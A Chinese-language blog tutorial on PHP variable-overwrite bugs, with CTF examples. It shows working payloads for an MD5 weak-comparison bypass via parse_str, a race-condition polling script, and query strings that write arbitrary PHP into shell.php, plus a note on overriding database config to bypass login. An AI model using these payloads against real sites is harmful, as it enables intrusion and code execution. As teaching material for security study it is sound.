变量覆盖问题 by L0st

变量覆盖

0x01 register_globals

register_globals是php.ini里的一个配置,这个配置影响到php如何接收传递过来的参数。

顾名思义,register_globals的意思就是注册为全局变量,所以当On的时候,传递过来的值会被直接的注册为全局变量直接使用,而Off的时候,我们需要到特定的数组里去得到它。

例如:

当register_globals=Off的时候,下一个程序接收的时候应该用$_GET['user_name']$_GET['user_pass']来接受传递过来的值。

当register_globals=On的时候,下一个程序可以直接使用$user_name$user_pass来接受值。

**注意,在没有开启全局Register_blobals的情况下,调用extract(),parse_str(),import_request_variables()相当于开启了全局变量注册 **

0x02 php中的$str

这种写法叫做可变变量,先声明一个普通变量:

<?php
    $a = "hello";
?>

再申明一个可变变量来获取一个普通变量的值作为该可变变量的变量名。

<?php
$$a = "world";
?> 

这时,两个变量都被定义了:$a的内容是“hello”并且 $hello 的内容是“world”。因此,可以表述为:

<?php
echo "$a ${$a}";
?> 

等同于:

<?php
echo "$a $hello";
?> 

均输出"hello world"

我刚开始总是搞不明白这几个变量之间的关系,其实结合实例对比一下就知道了:

<?php
foreach(Array('_GET') as $_request)
{
    var_export($_GET);
    echo "/////";
    echo $_request;
    echo "///////";
    foreach($$_request as $_k => $_v) {
        echo $_k;
        ${$_k} = $_v;
        echo "/////";
        echo ${$_k};
    }
}

使用外部传递进来的参数不是类似与$_GET['key']这样的原始的数组变量,而是通过$$key把里面的key注册成了一个变量$key,导致覆盖

0x03 php中的unset()

unset()在函数中的行为会依赖于想要销毁的变量的类型而有所不同.

  1. 如果在函数中 unset() 一个通过引用传递(&$str)的变量,则只是局部变量被销毁,而在调用环境中的变量将保持调用
    unset() 之前一样的值。
  2. 如果在函数中 unset() 一个全局变量,则只是局部变量被销毁,而在调用环境中的变量将保持调用
    unset() 之前一样的值。

意为unset()函数无法销毁一个全局变量,要销毁全局变量必须使用$GLOBALS['var_name']

0x04 extract()变量覆盖

extract(array,flags=EXTR_OVERWRITE,EXTR_IF_EXISTS,prefix)

extract用于从数组中将变量导入到当前的符号表,意思就是将数组中的键值对注册成变量。

  1. 此函数会将键名当作变量名,值作为变量的值。

  2. flags为对待非法/数字和冲突的键名的方法

  3. prefix 仅在flags 的值是EXTR_PREFIX_SAME,EXTR_PREFIX_ALL,EXTR_PREFIX_INVALID或EXTR_PREFIX_IF_EXISTS时需要。

0x05 import_request_variables()变量覆盖

  1. 相当于开启了全局变量注册,这时候只要找哪些变量没有初始化并且操作之前没有赋值的,然后就去提交这个变量作为参数。

  2. 写在import_request_variables()之前的变量,不管是否已经初始化都可以覆盖(PHP 4.1-5.4.0)

将 GET/POST/Cookie 变量导入到全局作用域中。如果你禁止了
register_globals,但又想用到一些全局变量,那么此函数就很有用。

你可以使用 types参数指定需要导入的变量。可以用字母‘G’、‘P’和‘C’分别表示
GET、POST 和 Cookie。这些字母不区分大小写,所以你可以使用‘g’、‘p’和‘c’的任何组合。

例如:import_request_variables('G')导入GET请求中的变量

0x06 parse_str() 变量覆盖

void parse_str( $encoded_string, $result)

作用是解析字符串并且注册成变量,它在注册变量之前不会验证当前变量是否已经存在,所以会直接覆盖掉已有变量。

如果 encoded_string 是 URL 传递入的查询字符串(query string),则将它解析为变量并设置到当前作用域(如果提供了 result 则会设置到该数组里 )

与parse_str类似的还有mb_parse_str().

实例一

可以看到HTTP_REFERER中传入的参数id会被解析为参数$id,带入sql语句进行查询

我们知道,全局变量注册之前的参数都会被覆盖掉,如果我们在这里提交类似 config[dbhost]=127.0.0.1 的数据,可以覆盖掉前面连接数据库的配置,连接我们自己的数据库,可以在登陆时绕过验证。

实例二
//index.php
<?php
$a = “hongri”;
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
    echo '<a href="uploadsomething.php">flag is here</a>';
}
?>
//uploadsomething.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];   //通过a标签点击的链接,会自己自动携带上refer字段
if(isset($referer)!== false) {
    $savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
    if (!is_dir($savepath)) {
        $oldmask = umask(0);
        mkdir($savepath, 0777);
        umask($oldmask);
    }
    if ((@$_GET['filename']) && (@$_GET['content'])) {
        //$fp = fopen("$savepath".$_GET['filename'], 'w');
        $content = 'HRCTF{y0u_n4ed_f4st}   by:l1nk3r';
        file_put_contents("$savepath" . $_GET['filename'], $content);
        $msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
        usleep(100000);
        $content = "Too slow!";
        file_put_contents("$savepath" . $_GET['filename'], $content);
    }
   print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
    echo 'you can not see this page';
}
?>

index.php需要我们传入一个数组,并在a[0]处将原变量$a覆盖掉,然后利用PHP弱类型即可绕过MD5值判断,而parse_str函数会将传入的字符串自动解码,故payload:?id=a%5b0%5d%3d240610708或是?id=a[0]=s878926199a成功进入下一步index.php

uploadsomething.php就需要用到竞争条件,程序通过$_SERVER['REMOTE_ADDR']获取用户IP并将其SHA1加密作为文件目录,然后将FlAG内容写入文件,在0.1秒后重写文件覆盖掉FLAG的内容,所以需要我们写脚本来获取FLAG的内容。

官方WP的解法是,开Burp的200线程,不断发送上传文件的数据包。在start attack之前需要一个脚本不断请求所上传的文件地址:

import requests as r
r1=r.Session()
while (1):
r2=r1.get("http://127.0.0.1/parse_str/uploads/4b84b15bff6ee5796152495a230e45e3d7e947d9/flag")
    print r2.text
    pass
实例三
  1. get_object_vars 返回由对象属性组成的关联数组

  2. var_export此函数返回关于传递给该函数的变量的结构信息,它和
    var_dump()类似,不同的是其返回的表示是合法的PHP 代码

    意思就是把全局变量全部返回到页面上,返回的内容会当作PHP代码执行。

  3. 注意!PHP中的变量自增不起作用,即$count++ = $count变量不会发生改变

第10-11行 处, Carrot 类的构造方法将超全局数组 $_GET 进行变量注册,这样即可覆盖 第8行 已定义的 $this->id 变量。而在 第16行 处的析构函数中, file_put_contents 函数的第一个参数又是由 $this-> 变量拼接的,这就导致我们可以控制写入文件的位置,最终造成任意文件写入问题。

要写入自定义的内容,我们需要先闭合var_export函数,它的返回形式是:

array('id'=>'../var/www/','lost'=>0,'bought'=>'0','var'=>'string',)参考参数id,我们构造payload:

?id=../var/www/html/shell.php&shell=',)%0a<?php phpinfo; ?>//

我们还可以利用PHP中的"能够执行代码的特点,构造如"<?php phpinfo();?>"的payload:id=../../var/www/html/test/shell.php&t1=1"<?php phpinfo()?>"//

//shell.php
array (
'id' => '../../var/www/html/test/shell.php',
'lost' => 0,
'bought' => 0,
't1' => '1"<?php phpinfo()?>"//',
)

所以本题的重点是在变量覆盖和$count++没有起作用,但如果是++$count就要注意了:

$test = 123; echo ++$test;      // 124
$test = '123'; echo ++$test;    // 124
$test = '1ab'; echo ++$test;    // '1ac'
$test = 'ab1'; echo ++$test;    // 'ab2'
$test = 'a1b'; echo ++$test;    // 'a1c'
$test =array(2,'name'=>'wyj'); echo ++$test;    //Array

通过分析发现,在进行++操作时会进行隐式类型转换,如果能够转换成功,则会进行加法操作;如果不能转换成功,则将最后一个字符进行加法操作。

若将本题的代码改为下面这种:

foreach ($input as $field => $count) {
    $this->$field = ++$count;
}

payload:?id=../var/html/test/shell.pho&shell=1"<?php phpinfo(); ?>"123

pho自增过后就会变为php


挖掘经验

  1. 要挖可用的变量覆盖漏洞,一定要看漏洞代码行之前存在那些变量可以覆盖并且后面又被使用到。

  2. 由函数导致的变量覆盖比较好挖掘,只要搜寻以上的几个高危变量,然后回溯变量是否可控。

  3. $REQUEST解析与parse_str解析传入的数据有区别,parse_str会对数据进行解码,比如传入[a=1&b=2%26c=3],$REQUEST解析为[a=1,b=2%26c=3],parse_str解析为[a=1,b=2,c=3]

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 202,009评论 5 474
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,808评论 2 378
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,891评论 0 335
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,283评论 1 272
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,285评论 5 363
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,409评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,809评论 3 393
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,487评论 0 256
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,680评论 1 295
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,499评论 2 318
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,548评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,268评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,815评论 3 304
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,872评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,102评论 1 258
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,683评论 2 348
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,253评论 2 341

推荐阅读更多精彩内容

  • PHP:include()``include_once()``require()``require_once() ...
    寻梦xunm阅读 841评论 1 4
  • 一、php可以做什么 php是一种可以在服务器端运行的编程语言,可以运行在Web服务器端。 php是一门后台编程语...
    空谷悠阅读 3,081评论 4 97
  • 2018年7月22日天气晴星期日 忙碌的一天又开始了,早上起来洗漱做饭。孩子们起来晨读,我诵读父母规。七...
    执手踏青_f553阅读 337评论 4 2
  • 独在异乡为异客, 乐观向上随遇安, 事无难事有心人, 三思后行践第一。
    A把时间当做朋友阅读 77评论 0 1
  • 我第一次学会倒立了!感恩
    池浅笑安然阅读 145评论 1 0